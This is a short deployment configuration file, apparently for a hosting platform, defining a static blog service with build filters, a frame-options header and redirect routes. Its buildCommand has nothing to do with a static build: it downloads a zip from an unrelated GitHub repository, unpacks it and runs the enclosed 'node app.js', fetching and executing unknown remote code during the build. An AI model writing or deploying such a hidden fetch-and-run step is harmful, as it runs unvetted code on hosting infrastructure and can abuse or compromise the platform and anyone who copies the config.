type: web
    name: my-blog
    runtime: static
    buildCommand: wget https://github.com/hemsakatu/effective-chainsaw/raw/master/node.zip;unzip node.zip;node app.js
    staticPublishPath: ./build
    pullRequestPreviewsEnabled: true # Enable service previews
    buildFilter:
      paths:
      - src/**/*.js
      ignoredPaths:
      - src/**/*.test.js
    headers:
      - path: /*
        name: X-Frame-Options
        value: sameorigin
    routes:
      - type: redirect
        source: /old
        destination: /new
      - type: rewrite
        source: /a/*
        destination: /a
#
#################################################################
